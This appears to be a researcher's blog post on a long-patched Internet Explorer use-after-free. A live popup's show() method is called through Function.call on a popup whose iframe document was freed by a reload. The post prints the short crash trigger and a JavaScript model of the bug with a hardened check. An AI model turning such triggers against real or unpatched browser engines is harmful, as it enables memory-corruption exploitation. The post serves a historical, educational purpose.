This was the first entry in what I called the “deadcall” collection — a series of crashes where Function.call (and equivalently bind and apply) was used to execute a method of one object on behalf of a destroyed object. Here, the show() method of a live popup was called on behalf of a dead one.

var goodPop = createPopup();         // popup owned by the top-level document (stays alive)
var badPop = iFrame.createPopup();   // popup owned by the iframe's document

iFrame.location.reload(); // badPop is now dead

setTimeout(function() {
    goodPop.show.call(badPop, 0, 0, 500, 500); // PROBABLY_EXPLOITABLE crash
});

Function.call allowed bypassing the normal method dispatch by substituting badPop as this for goodPop.show. After the reload, badPop’s backing CDoc had been freed, but the JavaScript wrapper was still reachable. Calling show() through it tried to send a window message to the freed document object, causing an access violation in MSHTML!CDoc::OnWindowMessage that was rated PROBABLY_EXPLOITABLE.
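The pattern above, modelled in plain JavaScript as an added example (not code from the post): a wrapper whose native backing has been torn down, a method that trusts whatever `this` a caller substitutes, and the hardened form that checks receiver type and liveness before dereferencing the backing object. `Backing`, `Popup`, `showUnchecked`, `showChecked`, `invoke` and `deadcall` are hypothetical names chosen for the model.

```javascript
// Model of the "deadcall" pattern (added example, not the post's code).
// `Backing` stands in for the native CDoc; all names are hypothetical.
class Backing {
  constructor(id) { this.id = id; this.freed = false; }
  onWindowMessage(msg) {
    if (this.freed) {
      // Stands in for the access violation on the freed document object.
      throw new Error("use-after-free: " + msg + " sent to freed backing " + this.id);
    }
    return "backing " + this.id + " handled " + msg;
  }
}
class Popup {
  constructor(id) { this.backing = new Backing(id); }
  // Models the iframe reload: the native object is torn down while the
  // JavaScript wrapper stays reachable and still points at it.
  reload() { this.backing.freed = true; }
}

// Unchecked native method: trusts whatever `this` the caller substituted.
function showUnchecked(x, y, w, h) {
  return this.backing.onWindowMessage("show " + [x, y, w, h].join(","));
}

// Hardened native method: confirms the receiver is a live Popup before
// dereferencing its backing object, failing cleanly otherwise.
function showChecked(x, y, w, h) {
  if (!(this instanceof Popup)) throw new TypeError("Illegal invocation");
  if (this.backing.freed) throw new Error("InvalidStateError: popup is closed");
  return this.backing.onWindowMessage("show " + [x, y, w, h].join(","));
}

// Calls `method` with an explicit receiver and reports the outcome.
function invoke(method, receiver, ...args) {
  try {
    return { ok: true, value: method.call(receiver, ...args) };
  } catch (e) {
    return { ok: false, error: e.constructor.name + ": " + e.message };
  }
}

// The post's sequence: a live popup's show() run with a dead popup as `this`.
function deadcall(showImpl) {
  const goodPop = new Popup("good");
  const badPop = new Popup("bad");
  goodPop.show = showImpl;
  badPop.reload();                                   // badPop is now dead
  return invoke(goodPop.show, badPop, 0, 0, 500, 500);
}
```

With the unchecked method the dead receiver reaches the freed backing; with the checked one the same call fails at the liveness check, and a non-Popup receiver fails at the type check.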

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.